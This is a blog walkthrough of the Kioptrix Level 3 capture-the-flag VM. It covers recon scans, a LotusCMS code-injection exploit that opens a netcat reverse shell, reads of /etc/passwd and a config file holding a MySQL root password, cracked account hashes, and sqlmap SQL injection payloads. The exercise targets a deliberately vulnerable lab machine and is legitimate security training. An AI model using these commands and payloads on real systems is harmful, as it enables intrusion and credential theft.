Tuesday, 16 August 2016

Kioptrix Level 3

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of the VM Kioptrix L3 from Vulnhub - a site dedicated to penetration testing Capture The Flag challenges. 




Scenario let's try this:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.139
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139
nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.139
dirb http://192.168.180.139
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
nikto -h 192.168.180.139

In case there is SMB:
smbclient -N -L 192.168.180.139
enum4linux -a 192.168.180.139


 Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.                
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.                
 192.168.180.139 00:0c:29:e3:3f:e5      1      60  VMware, Inc.                
 192.168.180.254 00:50:56:ee:9d:40      1      60  VMware, Inc.    

nmap -sV -T4 -O -F --version-light 192.168.180.139
Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:38 EDT
Nmap scan report for 192.168.180.139
Host is up (0.00019s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:E3:3F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.94 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:39 EDT
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAL4CpDFXD9Zn2ONktcyGQL37Dn6s9JaOv3oKjxfdiABm9GjRkLEtbSAK3vhBBUJTZcVKYZk21lFHAqoe/+pLr4U9yOLOBbSoKNSxQ2VHN9FOLc9C58hKMF/0sjDsSIZnaI4zO7M4HmdEMYXONrmj2x6qczbfqecs+z4cEYVUF3R3AAAAFQCuG9mm7mLm1GGqZRSICZ+omMZkKQAAAIEAnj8NDH48hL+Pp06GWQZOlhte8JRZT5do6n8+bCgRSOvaYLYGoNi/GBzlET6tMSjWMsyhVY/YKTNTXRjqzS1DqbODM7M1GzLjsmGtVlkLoQafV6HJ25JsKPCEzSImjeOCpzwRP5opjmMrYBMjjKqtIlWYpaUijT4uR08tdaTxCukAAACBAJeJ9j2DTugDAy+SLCa0dZCH+jnclNo3o6oINF1FjzICdgDONL2YbBeU3CiAL2BureorAE0lturvvrIC2xVn2vHhrLpz6NPbDAkrLV2/rwoavbCkYGrwXdBHd5ObqBIkoUKbI1hGIGA51nafI2tjoXPfIeHeNOep20hgr32x9x1x
|   2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyOv6c+5ON+N+ZNDtjetiZ0eUxnIR1U0UqSF+a24Pz2xqdnJC1EN0O3zxGJB3gfPdJlyqUDiozbEth1GBP//8wbWsa1pLJOL1YmcumEJCsitngnrVN7huACG127UjKP8hArECjCHzc1P372gN3AQ/h5aZd0VV17e03HnAJ64ZziOQzVJ+DKWJbiHoXC2cdD1P+nlhK5fULe0QBvmA14gkl2LWA6KILHiisHZpF+V3X7NvXYyCSSI9GeXwhW4RKOCGdGVbjYf7d93K9gj0oU7dHrbdNKgX0WosuhMuXmKleHkIxfyLAILYWrRRj0GVdhZfbI99J3TYaR/yLTpb0D6mhw==
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:E3:3F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.01%E=4%D=8/15%OT=22%CT=1%CU=34293%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=57B155A9%P=i586-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=CB%TI=Z%CI=Z%II=I%TS=
OS:7)OPS(O1=M5B4ST11NW5%O2=M5B4ST11NW5%O3=M5B4NNT11NW5%O4=M5B4ST11NW5%O5=M5
OS:B4ST11NW5%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A
OS:0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW
OS:5%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%U
OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.001 days (since Mon Aug 15 01:38:55 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.18 ms 192.168.180.139

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:39
Completed NSE at 01:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:39
Completed NSE at 01:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.346KB)

nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.139

Nothing interesting from this scan.

dirb http://192.168.180.139

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Aug 15 01:49:58 2016
URL_BASE: http://192.168.180.139/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.180.139/ ----
==> DIRECTORY: http://192.168.180.139/cache/                                   
==> DIRECTORY: http://192.168.180.139/core/                                    
+ http://192.168.180.139/data (CODE:403|SIZE:326)                              
+ http://192.168.180.139/favicon.ico (CODE:200|SIZE:23126)                     
==> DIRECTORY: http://192.168.180.139/gallery/                                 
+ http://192.168.180.139/index.php (CODE:200|SIZE:1819)                        
==> DIRECTORY: http://192.168.180.139/modules/                                 
==> DIRECTORY: http://192.168.180.139/phpmyadmin/                              
+ http://192.168.180.139/server-status (CODE:403|SIZE:335)                     
==> DIRECTORY: http://192.168.180.139/style/                                   
                                                                               
---- Entering directory: http://192.168.180.139/cache/ ----
+ http://192.168.180.139/cache/index.html (CODE:200|SIZE:1819)                 
                                                                               
---- Entering directory: http://192.168.180.139/core/ ----
==> DIRECTORY: http://192.168.180.139/core/controller/                         
+ http://192.168.180.139/core/index.php (CODE:200|SIZE:0)                      
==> DIRECTORY: http://192.168.180.139/core/lib/                                
==> DIRECTORY: http://192.168.180.139/core/model/                              
==> DIRECTORY: http://192.168.180.139/core/view/                               
                                                                               
---- Entering directory: http://192.168.180.139/gallery/ ----
+ http://192.168.180.139/gallery/index.php (CODE:500|SIZE:5650)                
==> DIRECTORY: http://192.168.180.139/gallery/photos/                          
==> DIRECTORY: http://192.168.180.139/gallery/themes/                          
                                                                               
---- Entering directory: http://192.168.180.139/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/ ----
+ http://192.168.180.139/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)          
+ http://192.168.180.139/phpmyadmin/index.php (CODE:200|SIZE:8136)             
==> DIRECTORY: http://192.168.180.139/phpmyadmin/js/                           
==> DIRECTORY: http://192.168.180.139/phpmyadmin/lang/                         
+ http://192.168.180.139/phpmyadmin/libraries (CODE:403|SIZE:342)              
+ http://192.168.180.139/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)              
==> DIRECTORY: http://192.168.180.139/phpmyadmin/scripts/                      
==> DIRECTORY: http://192.168.180.139/phpmyadmin/themes/                       
                                                                               
---- Entering directory: http://192.168.180.139/style/ ----
+ http://192.168.180.139/style/admin.php (CODE:200|SIZE:356)                   
+ http://192.168.180.139/style/index.php (CODE:200|SIZE:0)                     
                                                                               
---- Entering directory: http://192.168.180.139/core/controller/ ----
+ http://192.168.180.139/core/controller/index.php (CODE:200|SIZE:0)           
                                                                               
---- Entering directory: http://192.168.180.139/core/lib/ ----
+ http://192.168.180.139/core/lib/index.php (CODE:200|SIZE:0)                  
                                                                               
---- Entering directory: http://192.168.180.139/core/model/ ----
+ http://192.168.180.139/core/model/index.php (CODE:200|SIZE:0)                
                                                                               
---- Entering directory: http://192.168.180.139/core/view/ ----
+ http://192.168.180.139/core/view/index.php (CODE:200|SIZE:0)                 
                                                                               
---- Entering directory: http://192.168.180.139/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Aug 15 01:50:07 2016
DOWNLOADED: 46120 - FOUND: 17


wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.180.139/FUZZ
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request    
==================================================================

00489:  C=301      9 L      31 W    357 Ch  "cache"
..."
00692:  C=301      9 L      31 W    356 Ch  "core"
..."
00779:  C=403     10 L      33 W    326 Ch  "data"
..."
02082:  C=301      9 L      31 W    362 Ch  "phpmyadmin"
..."
03035:  C=404      9 L      35 W    324 Ch  "yomama"..."


^C
Finishing pending requests...


nikto -h 192.168.180.139
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.180.139
+ Target Hostname:    192.168.180.139
+ Target Port:        80
+ Start Time:         2016-08-15 02:01:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2016-08-15 02:01:22 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


http://192.168.180.139/phpmyadmin/Documentation.html
phpMyAdmin 2.11.3 Documentation

http://192.168.180.139/phpmyadmin
Welcome to phpMyAdmin 2.11.3deb1ubuntu1.3

http://192.168.180.139/phpmyadmin/changelog.php
2.11.3.0 (2007-12-08)

http://192.168.180.139/index.php?system=Admin

Proudly Powered by: LotusCMS

http://192.168.180.139/gallery/index.php

At this point I added kioptrix3.com to the host file.

Did not work:
https://www.exploit-db.com/exploits/15964/

Let's try this one:
https://github.com/Hood3dRob1n/LotusCMS-Exploit

./lotusRCE.sh kioptrix3.com /

Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.180.132
What PORT?
443

OK, open your local listener and choose the method for back connect:
1) NetCat -e    3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.139] 47705

ps -aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.3   2844  1692 ?        Ss   04:33   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   04:33   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   04:33   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   04:33   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   04:33   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   04:33   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   04:33   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   04:33   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   04:33   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   04:33   0:00 [kacpi_notify]
root       104  0.0  0.0      0     0 ?        S<   04:33   0:00 [kseriod]
root       143  0.0  0.0      0     0 ?        S    04:33   0:00 [pdflush]
root       144  0.0  0.0      0     0 ?        S    04:33   0:00 [pdflush]
root       145  0.0  0.0      0     0 ?        S<   04:33   0:00 [kswapd0]
root       187  0.0  0.0      0     0 ?        S<   04:33   0:00 [aio/0]
root      1272  0.0  0.0      0     0 ?        S<   04:33   0:00 [ata/0]
root      1275  0.0  0.0      0     0 ?        S<   04:33   0:00 [ata_aux]
root      1284  0.0  0.0      0     0 ?        S<   04:33   0:00 [scsi_eh_0]
root      1287  0.0  0.0      0     0 ?        S<   04:33   0:00 [scsi_eh_1]
root      2208  0.0  0.0      0     0 ?        S<   04:33   0:00 [kjournald]
root      2364  0.0  0.1   2224   664 ?        S<s  04:34   0:00 /sbin/udevd --daemon
root      2732  0.0  0.0      0     0 ?        S<   04:34   0:00 [kpsmoused]
root      3864  0.0  0.1   1716   516 tty4     Ss+  04:34   0:00 /sbin/getty 38400 tty4
root      3865  0.0  0.0   1716   512 tty5     Ss+  04:34   0:00 /sbin/getty 38400 tty5
root      3869  0.0  0.1   1716   516 tty2     Ss+  04:34   0:00 /sbin/getty 38400 tty2
root      3870  0.0  0.1   1716   516 tty3     Ss+  04:34   0:00 /sbin/getty 38400 tty3
root      3872  0.0  0.1   1716   516 tty6     Ss+  04:34   0:00 /sbin/getty 38400 tty6
syslog    3913  0.0  0.1   1936   644 ?        Ss   04:34   0:00 /sbin/syslogd -u syslog
root      3932  0.0  0.1   1872   548 ?        S    04:34   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      3934  0.0  0.3   3028  1856 ?        Ss   04:34   0:00 /sbin/klogd -P /var/run/klogd/kmsg
root      3959  0.0  0.1   5316  1020 ?        Ss   04:34   0:00 /usr/sbin/sshd
root      4015  0.0  0.1   1772   524 ?        S    04:34   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4057  0.0  3.2 127228 16668 ?        Sl   04:34   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4059  0.0  0.1   1700   552 ?        S    04:34   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
daemon    4123  0.0  0.0   1984   420 ?        Ss   04:34   0:00 /usr/sbin/atd
root      4142  0.0  0.1   2104   892 ?        Ss   04:34   0:00 /usr/sbin/cron
root      4165  0.0  1.2  20780  6392 ?        Ss   04:34   0:00 /usr/sbin/apache2 -k start
www-data  4184  0.0  1.2  21272  6604 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4185  0.0  1.5  22032  7852 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4186  0.0  1.4  21732  7332 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4187  0.0  1.6  22280  8364 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4188  0.0  1.3  21308  6996 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
dhcp      4201  0.0  0.1   2440   764 ?        Ss   04:34   0:00 dhclient
root      4208  0.0  0.0   1716   508 tty1     Ss+  04:34   0:00 /sbin/getty 38400 tty1
www-data  4209  0.0  1.2  21304  6692 ?        S    04:37   0:00 /usr/sbin/apache2 -k start
www-data  4240  0.0  1.2  21272  6624 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4241  0.0  1.3  21404  6736 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4242  0.0  1.6  22560  8304 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4254  0.0  1.2  21280  6612 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4326  0.0  0.0   1772   488 ?        S    05:45   0:00 sh -c nc -e /bin/sh 192.168.180.132 443
www-data  4327  0.0  0.0   1772   488 ?        R    05:45   0:00 sh
www-data  4328  0.0  0.1   2364   920 ?        R    05:46   0:00 ps -aux

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

ls -la /home/loneferret/
total 64
drwxr-xr-x 3 loneferret loneferret  4096 Apr 17  2011 .
drwxr-xr-x 5 root       root        4096 Apr 16  2011 ..
-rw-r--r-- 1 loneferret users         13 Apr 18  2011 .bash_history
-rw-r--r-- 1 loneferret loneferret   220 Apr 11  2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret  2940 Apr 11  2011 .bashrc
-rw------- 1 root       root          15 Apr 15  2011 .nano_history
-rw-r--r-- 1 loneferret loneferret   586 Apr 11  2011 .profile
drwx------ 2 loneferret loneferret  4096 Apr 14  2011 .ssh
-rw-r--r-- 1 loneferret loneferret     0 Apr 11  2011 .sudo_as_admin_successful
-rw-r--r-- 1 root       root         224 Apr 16  2011 CompanyPolicy.README
-rwxrwxr-x 1 root       root       26275 Jan 12  2011 checksec.sh

A sudo user.

cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

cat /etc/issue
DISCLAIMER!
We at Kioptrix are not responsible for any damaged directly, or indirectly, 
caused by using this system. We suggest you do not connect this installation
to the Internet. It is, after all, a vulnerable setup. 
Please keep this in mind when playing the game.

This machine is setup to use DHCP.
Before playing the game, please modify your attacker's hosts file.
<ip> kioptrix3.com
This challenge contains a Web Application.

If you have any questions, please direct them to:
comms[at]kioptrix.com
Hope you enjoy this challenge.
-Kioptrix Team

Ubuntu 8.04.3 LTS \n \l

cat /etc/debian_version
lenny/sid

uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Something I missed at first, in the gallery config:
cat gconfig.php

<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";


http://kioptrix3.com/phpmyadmin/

 SELECT *
FROM `dev_accounts`
WHERE 1
LIMIT 0 , 30
Profiling [ Edit ] [ Explain SQL ] [ Create PHP Code ] [ Refresh ]

   
row(s) starting from record #
in
mode and repeat headers after cells   
Sort by key:
Full Texts id username password
Edit Delete 1 dreg 0d3eccfb887aabd50f243b3f155c0f85 <- Mast3r
Edit Delete 2 loneferret 5badcaf789d3d1d09794d8f021f40f0e <- starwars



Something even easier, I found in other reviews: 

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201606170a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:04:27

[04:04:27] [INFO] resuming back-end DBMS 'mysql' 
[04:04:27] [INFO] testing connection to the target URL
[04:04:27] [INFO] heuristics detected web page charset 'ISO-8859-2'
[04:04:27] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[04:04:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[04:04:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[04:04:27] [INFO] fetching database names
[04:04:28] [INFO] the SQL query used returns 3 entries
[04:04:28] [INFO] retrieved: information_schema
[04:04:28] [INFO] retrieved: gallery
[04:04:28] [INFO] retrieved: mysql
available databases [3]:                                                       
[*] gallery
[*] information_schema
[*] mysql

[04:04:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[04:04:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'


sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201606170a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:08:55

[04:08:55] [INFO] resuming back-end DBMS 'mysql' 
[04:08:55] [INFO] testing connection to the target URL
[04:08:55] [INFO] heuristics detected web page charset 'ISO-8859-2'
[04:08:55] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[04:08:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[04:08:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
